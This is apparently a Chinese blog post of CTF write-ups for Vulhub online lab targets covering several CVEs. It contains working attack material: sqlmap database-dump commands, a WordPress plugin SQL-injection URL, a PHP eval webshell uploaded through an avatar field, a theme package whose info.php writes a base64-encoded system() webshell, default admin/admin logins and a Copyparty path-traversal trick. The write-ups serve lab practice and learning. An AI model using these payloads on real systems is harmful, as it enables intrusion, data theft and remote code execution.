Vulhub在线靶场记录

发表于 更新于 分类于 本文字数: 2.6k 阅读时长 ≈ 5 分钟

开幕介绍&具体简介

具体环境为这个网站
能在线部署不少漏洞环境 很方便 正巧拿去了解一下vulhub与src

不会把打过的全部记录 主要是因为有的靶场重复度略高 分分钟就刷完了 说到底还是条懒狗
tips:靶场环境很怪 有的时候不开代理加载不全

常见套路

密码账号通常藏在网页信息中/单纯就是初始密码
使用将burp中的raw报文保存为txt后 mysql -r 文件名 -batch --dbs进行暴库的方式进行sql注入
↑多见于post传参时使用
只要文件类型允许php便能通过链接后端webshell的方式进行文件上传漏洞验证

Writeup

CVE-2022-32991

靶标介绍:

该CMS的welcome.php中存在SQL注入攻击。

靶标写的很清楚了 就是sql注入攻击
随意注册一个账号 登陆后便看到了我们的目标——welcome.php
1
拖到sqlmap里说是参数q并不能注入 点击start跳转目录 能看到更多的传参
再次放到sqlmap里处理….. 显示eid可注入 挺好的

-u "想注入的网址" //目标地址
--dbs //爆出所有数据库
-D //选中数据库 配合 --tables //爆出所有数据库下的项
-T //选中项 配合 --dump //爆出项中的数据

配合网址就能爆出数据库ctf中flag项里的具体数据——flag值 过关

CVE-2022-30887

靶标介绍:

多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。

一进主页面是全白的
铁定不对 先用dirb扫了一遍
2
发现个login目录 进去跳转到了wordpress的登陆页面
至于登陆的账号密码已经在标题上写好了——test
3
登陆进去看看
在wp-admin处 我们利用一个漏洞来获取mysql 数据库中的数据

http://eci-2ze816q8joahfm3hcxoi.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=rest-nonce //获取一段随机数
http://eci-2ze6ki5jtumuv5ixl9hu.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce=[刚刚获取的随机数]&name=words&search_engine=aaa

将输入后的内容用burpsuite抓包
4
然后将报文保存在一个1.txt中 然后利用sqlmap进行暴库

sqlmap -r 1.txt --batch --dbs

5

然后就很自然的爆出了flag 耶

CVE-2022-28525

靶标介绍:

ED01-CMS v20180505 存在任意文件上传漏洞

进入页面 发现需要登陆 且无法正常注册用户

6

那就f12看看线索吧…
发现似乎存在admin账号 那就先admin/admin试试 再不行抓包爆破了

7

然后顺利进去了 傻眼
管理员页面全是文章添加/删改相关的 能上传东西的只有一个账号头像了
上传后门文件1.php 内容还是老样子

<?php @eval($_POST['123']); ?>

8

右键图片处copy文件网址 放进蚁剑里链接 在/flag处获得flag 完成!

9

CVE-2023-7105

靶标介绍:

E-Commerce Website 1.0 允许通过“index_search.php”中的参数“search”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。

进入主页 翻到个搜索框 看来就是对应了靶标中的index_search功能
burp开着监听 随便搜点东西 监听到了搞成txt放进sqlmap
10

sqlmap -r [报文txt] --dbs //爆出数据库
sqlmap -r [报文txt] -D [数据库名] --tables //选中数据库爆出数据项
sqlmap -r [报文txt] -D [数据库名] -T [数据项名] --dump //爆出数据项中的数据

11

弄到最后一步就有flag了

CVE-2022-26965

靶标介绍:

Pluck-CMS-Pluck-4.7.16 后台RCE

进入页面啥也没有 点击脚注admin
输入密码admin进入后台
12

rce的具体地点发生在网站后台的更换主题
13

去github上搜索关键词 Pluck CMS 去寻找简介里有 theme 字眼的项目
14

进去之后在release页面下载 解压内容之后更改info.php文件内的具体代码

<?php
file_put_contents('testshell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg=='));
?>

修改完再次打包成zip 安装主题里弄上
安装完之后访问环境/testshell.php?1= cat /flag获取flag
完成!

CVE-2023-37474

靶标介绍:

Copyparty是一个可移植的文件服务器。在1.8.2版本之前的版本存在一个CTF技巧,该漏洞位于.cpr子文件夹中。路径遍历攻击技术允许攻击者访问位于Web文档根目录之外的文件、目录.

子目录也说了是.cpr 在网址后边输入/.cpr/(想要获取的文件名)
/符号用%2f代替即可 输入后便会自动下载相应的文件

结尾/引用

We are just another visitor in a transient world.